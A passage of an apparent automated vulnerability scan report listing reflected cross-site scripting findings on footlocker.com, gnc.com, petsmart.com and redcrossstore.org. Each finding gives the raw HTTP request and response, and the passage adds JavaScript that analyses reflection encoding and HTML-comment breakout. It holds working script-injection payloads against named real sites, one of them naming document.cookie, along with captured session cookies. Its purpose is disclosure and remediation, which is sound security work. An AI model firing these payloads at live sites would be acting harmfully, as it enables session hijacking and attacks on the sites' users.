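// Metacharacters that matter for leaving an HTML context.
const META = ['"', "'", '<', '>'];

// Find every PREFIX...SUFFIX reflection in `body` and report which metacharacters
// of the probe came back untouched between the markers.
function findReflections(body, prefix, probe, suffix) {
  const hits = [];
  let from = 0;
  for (;;) {
    const start = body.indexOf(prefix, from);
    if (start < 0) break;
    const end = body.indexOf(suffix, start + prefix.length);
    if (end < 0) break;
    const echoed = body.slice(start + prefix.length, end);
    const survived = META.filter(c => probe.includes(c) && echoed.includes(c));
    hits.push({
      echoed,
      survived,
      verdict: echoed === probe ? 'unmodified'
             : survived.length  ? 'partially encoded'
             :                    'encoded or stripped',
    });
    from = end + suffix.length;
  }
  return hits;
}

// Whether a reflection lets the attacker leave the context it landed in.
// A quote is needed to close a quoted attribute value; '<' is needed to open a tag in text.
function breaksOut(hit, context) {
  if (context === 'double-quoted attribute') return hit.survived.includes('"');
  if (context === 'single-quoted attribute') return hit.survived.includes("'");
  if (context === 'text') return hit.survived.includes('<');
  throw new Error('unknown context: ' + context);
}

// Constructed response fragments. RAW is copied from the 5.61 response; the other
// two are what a fully encoding and a quote-only encoding server would send.
const RAW      = '<INPUT TYPE="hidden" name="cc4cf"><script>alert(1)</script>a937fb8d7fa" VALUE="1">';
const ENCODED  = '<INPUT TYPE="hidden" name="cc4cf&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;a937fb8d7fa" VALUE="1">';
const HALFDONE = '<INPUT TYPE="hidden" name="cc4cf&quot;><script>alert(1)</script>a937fb8d7fa" VALUE="1">';

for (const [label, body] of [['raw', RAW], ['encoded', ENCODED], ['half-done', HALFDONE]]) {
  const hit = findReflections(body, PREFIX, PROBE, SUFFIX)[0];
  console.log(label, hit.verdict, 'breaks attribute:', breaksOut(hit, 'double-quoted attribute'));
}
```

The half-encoded case is the one to watch for when triaging: a server that encodes only the double quote is safe for this particular sink (the attacker cannot close the name attribute) but the same filter would be useless for a reflection into text content, where the surviving angle brackets are all that is needed.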

Request

GET /login/login_form.cfm?cc4cf"><script>alert(1)</script>a937fb8d7fa=1 HTTP/1.1
Host: www.footlocker.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:57:51 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 10:57:51 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQqXKf%2FLacY0A0lvf86Z45bfsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: NST=2011%2D05%2D16%2005%3A57%3A51;path=/
Set-Cookie: TID=5555%2D51161105572151050592439%2D0;expires=Sun, 14-Aug-2011 10:57:51 GMT;path=/
Set-Cookie: TRACK_USER_P=73934511611055751050537879;expires=Wed, 08-May-2041 10:57:51 GMT;path=/
Set-Cookie: DOTOMI_SESSION=1;path=/
Set-Cookie: CHOSEN_BANNER=2;expires=Wed, 08-May-2041 10:57:51 GMT;path=/
Content-Length: 3665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<INPUT TYPE="hidden" name="cc4cf"><script>alert(1)</script>a937fb8d7fa" VALUE="1">
...[SNIP]...

5.62. http://www.gnc.com/community/index.jsp%20%20 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /community/index.jsp%20%20

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a33e7--><script>alert(1)</script>7d4814ce5e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response below is a 404 Not Found (the requested path ends in two encoded spaces), so the template that writes the query string into a comment is shared by the error page: any path on the host will do.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
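The following is an added example, not code from the XSS.CX report or from gnc.com. It shows why the 5.62 payload escapes the debugging comment (a comment ends at the first "-->" or "--!>" the tokenizer meets, wherever that is) and what encoding keeps data inside one. The two template functions are assumptions modelled on the echoed comment in the response below; the comment splitter follows the HTML tokenizer's comment states but ignores the abrupt "<!-->" and "<!--->" forms, which do not arise here.

```javascript
// Added example (not from the report): HTML comment breakout and its fix.

// Payload from 5.62, as it appears in the echoed query string.
const PAYLOAD = 'a33e7--><script>alert(1)</script>7d4814ce5e6=1';

// Vulnerable: the raw query string is written into a debugging comment (assumed template).
function debugCommentVulnerable(queryString) {
  return '<!-- === Request Query String: ' + queryString + ' -->';
}

// Hardened: encoding ">" alone guarantees the data can never form "-->" or "--!>";
// "<" and "&" are encoded as well, and "--" runs are broken up because XML forbids
// them inside comments and SGML-based parsers treat them as delimiters.
function sanitizeForComment(s) {
  return String(s)
    .replace(/[&<>]/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;' })[c])
    .replace(/-(?=-)/g, '- ');
}
function debugCommentHardened(queryString) {
  return '<!-- === Request Query String: ' + sanitizeForComment(queryString) + ' -->';
}

// Split markup the way the tokenizer does: data from "<!--" to the first "-->" or
// "--!>" is the comment; whatever follows is parsed as live markup.
function splitComment(markup) {
  const start = markup.indexOf('<!--');
  if (start < 0) return { comment: null, trailing: markup };
  const dataStart = start + 4;
  let end = -1, closeLen = 0;
  for (const close of ['-->', '--!>']) {
    const at = markup.indexOf(close, dataStart);
    if (at >= 0 && (end < 0 || at < end)) { end = at; closeLen = close.length; }
  }
  if (end < 0) return { comment: markup.slice(dataStart), trailing: '' };   // unterminated comment
  return { comment: markup.slice(dataStart, end), trailing: markup.slice(end + closeLen) };
}

console.log('vulnerable, parsed as markup:', JSON.stringify(splitComment(debugCommentVulnerable(PAYLOAD)).trailing));
console.log('hardened,   parsed as markup:', JSON.stringify(splitComment(debugCommentHardened(PAYLOAD)).trailing));
```

With the vulnerable template the script element lands outside the comment and executes; with the hardened template nothing follows the real "-->", and the payload is still readable in the comment for whoever the debug output was meant for.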

Request

GET /community/index.jsp%20%20?a33e7--><script>alert(1)</script>7d4814ce5e6=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Referer: http://app.gnc.com/profile/profile.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; s_pers=%20s_nr%3D1305511477578%7C1308103477578%3B%20s_lastvisit%3D1305540969641%7C1400148969641%3B%20gpv_p6%3DMy%2520Account%253A%2520Sign-In%7C1305542769642%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//app.gnc.com/profile/profile.cfm%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 10:19:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=rHr7NQ6hxmbbQy3CRHv3dWTTBj0czv8myJPZNQ3PhPpJhckzF2jj!-1853905486; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 80212


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm
...[SNIP]...
<!-- === Request Query String: a33e7--><script>alert(1)</script>7d4814ce5e6=1 -->
...[SNIP]...

5.63. http://www.gnc.com/home/index.jsp [c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The value of the c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 request parameter is copied into an HTML comment. The payload 5f6c9--><script>alert(1)</script>7b7524930d was submitted in that parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The parameter name is itself a variant of the 5.64 payload (same markers, alert(document.cookie) substituted) that was retained as a crawled URL. The comment reproduces the query string exactly as it arrived on the wire: the percent-encoded name stays encoded while the literal payload in the value comes through raw. The sink therefore performs no URL decoding, and a real attack depends on the victim's browser sending "<", ">" and "-->" unencoded in the query string; a browser that percent-encodes angle brackets in URLs will not deliver this payload as written.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=15f6c9--><script>alert(1)</script>7b7524930d HTTP/1.1
Host: www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=p2GCNRCTz3d1h2C5cBh1h4qPJL2n70PJ4F6vnvf26JpKDT2qs10P!672921789; __g_c=w%3A0; mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543402575%7C1308135402575%3B%20gpv_p6%3DHome%2520Page%7C1305545202577%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]; __utma=1.1693801748.1305543186.1305543186.1305543186.1; __utmb=1.3.10.1305543186; __utmc=1; __utmz=1.1305543186.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:57:42 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115314


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<!-- === Request Query String: c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=15f6c9--><script>alert(1)</script>7b7524930d -->
...[SNIP]...

5.64. http://www.gnc.com/home/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c5205--><script>alert(1)</script>bb446d17c91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?c5205--><script>alert(1)</script>bb446d17c91=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; mt.v=1.1817838745.1305510198897; s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.1.10.1305510217

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114340


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<!-- === Request Query String: c5205--><script>alert(1)</script>bb446d17c91=1 -->
...[SNIP]...

5.65. https://www.gnc.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 212ec--><script>alert(1)</script>8e54d0e09a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=orderTrackingLogin&212ec--><script>alert(1)</script>8e54d0e09a5=1 HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:16:20 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 97847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<!-- === Request Query String: process=orderTrackingLogin&212ec--><script>alert(1)</script>8e54d0e09a5=1 -->
...[SNIP]...

5.66. http://www.petsmart.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5f832--><script>alert(1)</script>3105c4c3d6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?5f832--><script>alert(1)</script>3105c4c3d6e=1 HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; __utmb=113636102.1.10.1305509971; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305509972462%7C1308101972462%3B%20s_lastvisit%3D1305509972464%7C1400117972464%3B%20gpv_p27%3DHome%2520Page%7C1305511772467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __g_c=w%3A1%7Cb%3A2%7Cr%3A%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview T
...[SNIP]...
<!-- === Request Query String: isInSecureMode=false&pageType=home&5f832--><script>alert(1)</script>3105c4c3d6e=1 -->
...[SNIP]...

5.67. http://www.petsmart.com/ [rdir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /

Issue detail

The value of the rdir request parameter is copied into an HTML comment. The payload 25e8c--><script>alert(1)</script>dc42a180bb was submitted in the rdir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?rdir=1A25e8c--><script>alert(1)</script>dc42a180bb HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:00 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview T
...[SNIP]...
<!-- === Request Query String: isInSecureMode=false&pageType=home&rdir=1A25e8c--><script>alert(1)</script>dc42a180bb -->
...[SNIP]...

5.68. https://www.petsmart.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 105bc--><script>alert(1)</script>2e44051ff6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=login&105bc--><script>alert(1)</script>2e44051ff6d=1 HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:19:13 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
<!-- === Request Query String: isInSecureMode=true&pageType=Checkout&process=login&105bc--><script>alert(1)</script>2e44051ff6d=1 -->
...[SNIP]...

5.69. http://www.redcrossstore.org/Shopper/Product.aspx [UniqueItemId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /Shopper/Product.aspx

Issue detail

